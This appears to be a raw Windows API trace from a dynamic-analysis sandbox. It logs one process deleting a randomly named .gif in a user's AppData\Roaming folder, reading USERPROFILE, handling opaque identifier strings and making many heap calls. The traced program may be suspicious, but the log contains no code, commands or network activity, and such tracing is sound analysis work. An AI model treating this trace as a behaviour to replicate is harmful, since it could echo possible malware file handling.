FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\x_7SfFt5-eJAhmf88.gif", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10a83210, ftCreationTime.dwHighDateTime=0x1d5cc61, ftLastAccessTime.dwLowDateTime=0x5e8983f0, ftLastAccessTime.dwHighDateTime=0x1d5c796, ftLastWriteTime.dwLowDateTime=0x5e8983f0, ftLastWriteTime.dwHighDateTime=0x1d5c796, nFileSizeHigh=0x0, nFileSizeLow=0xd7ac, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="x_7SfFt5-eJAhmf88.gif", cAlternateFileName="X_7SFF~1.GIF")) returned 0x9e1b78 [0152.446] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\x_7SfFt5-eJAhmf88.gif" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\x_7sfft5-ejahmf88.gif")) returned 1 [0152.459] FindNextFileW (in: hFindFile=0x9e1b78, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10a83210, ftCreationTime.dwHighDateTime=0x1d5cc61, ftLastAccessTime.dwLowDateTime=0x5e8983f0, ftLastAccessTime.dwHighDateTime=0x1d5c796, ftLastWriteTime.dwLowDateTime=0x5e8983f0, ftLastWriteTime.dwHighDateTime=0x1d5c796, nFileSizeHigh=0x0, nFileSizeLow=0xd7ac, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="x_7SfFt5-eJAhmf88.gif", cAlternateFileName="X_7SFF~1.GIF")) returned 0 [0152.459] FindClose (in: hFindFile=0x9e1b78 | out: hFindFile=0x9e1b78) returned 1 [0152.459] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0152.459] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0152.459] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0152.459] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0152.459] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0152.459] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0152.459] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0152.459] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0152.459] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0152.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0152.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0152.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0152.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0152.460] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0152.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0152.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0152.460] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0152.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0152.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0152.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa92e0 [0152.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0152.460] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0152.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9310 [0152.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0152.460] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0152.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0152.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0152.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0152.460] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0152.460] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0152.460] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0152.460] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0152.460] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0152.460] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0152.460] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0152.460] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0152.460] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0152.460] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0152.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0152.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f00 [0152.460] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0152.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a683a8 [0152.461] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0152.461] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0152.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0152.461] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0152.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0152.461] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0152.461] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0152.461] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0152.461] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0152.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0152.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0152.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0152.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0152.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0152.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0152.461] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0152.461] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0152.461] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0152.461] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0152.461] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0152.461] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x6c) returned 0x29f3ee0 [0152.461] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/x_7SfFt5-eJAhmf88.gif", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\x_7SfFt5-eJAhmf88.gif", lpFilePart=0x8cf650*="x_7SfFt5-eJAhmf88.gif") returned 0x35 [0152.461] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f3ee0 | out: hHeap=0x2af0000) returned 1 [0152.461] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\x_7SfFt5-eJAhmf88.gif" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\x_7sfft5-ejahmf88.gif")) returned 0xffffffff [0152.461] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0152.461] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0152.461] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0152.462] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0152.462] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0152.462] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0152.462] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0152.462] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0152.462] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0152.462] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0152.462] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0152.462] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0152.462] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0152.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0152.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0152.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0152.462] CharUpperBuffW (in: lpsz="A5700E02918", cchLength=0xb | out: lpsz="A5700E02918") returned 0xb [0152.462] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0152.462] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0152.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0152.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a98 [0152.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0152.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0152.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0152.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0152.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0152.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0152.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0152.462] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0152.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0152.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0152.462] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0152.462] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0152.463] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0152.463] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9310 [0152.463] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0152.463] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0152.463] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa90b8 [0152.463] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0152.463] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf2b8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0152.463] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0152.463] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0152.463] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0152.463] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0152.463] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0152.463] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0152.463] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0152.463] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0152.463] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0152.463] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0152.463] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0152.463] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0152.463] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0152.463] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0152.463] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0152.463] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0152.463] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x2a683a8 [0152.463] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0152.463] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0152.463] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0152.463] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0152.463] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0152.463] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719c8 [0152.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0152.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0152.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0152.464] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0152.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719d8 [0152.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0152.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0152.464] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0152.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9040 [0152.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0152.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0152.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0152.464] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0152.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0152.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0152.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0152.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0152.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0152.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0152.464] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0152.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0152.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0152.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0152.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0152.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0152.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0152.464] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0152.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0152.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0152.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0152.464] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0152.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0152.465] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0152.465] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0152.465] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0152.465] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0152.465] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0152.465] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0152.465] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0152.465] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0152.465] CharUpperBuffW (in: lpsz="SSA5700E02918", cchLength=0xd | out: lpsz="SSA5700E02918") returned 0xd [0152.465] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0152.465] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0152.465] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0152.465] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0152.465] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0152.465] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0152.465] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0152.465] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0152.465] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0152.465] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0152.465] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0152.465] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0152.465] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0152.465] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0152.465] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0152.465] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0152.465] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0152.465] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0152.465] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0152.465] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0152.465] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0152.466] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0152.466] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0152.466] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0152.466] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0152.466] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0152.466] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0152.466] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0152.466] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0152.466] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0152.466] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0152.466] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0152.466] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0152.466] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0152.466] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0152.466] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0152.466] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0152.466] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0152.466] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0152.466] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0152.466] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0152.466] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0152.466] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0152.466] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0152.466] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0152.466] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0152.466] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0152.466] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0152.466] 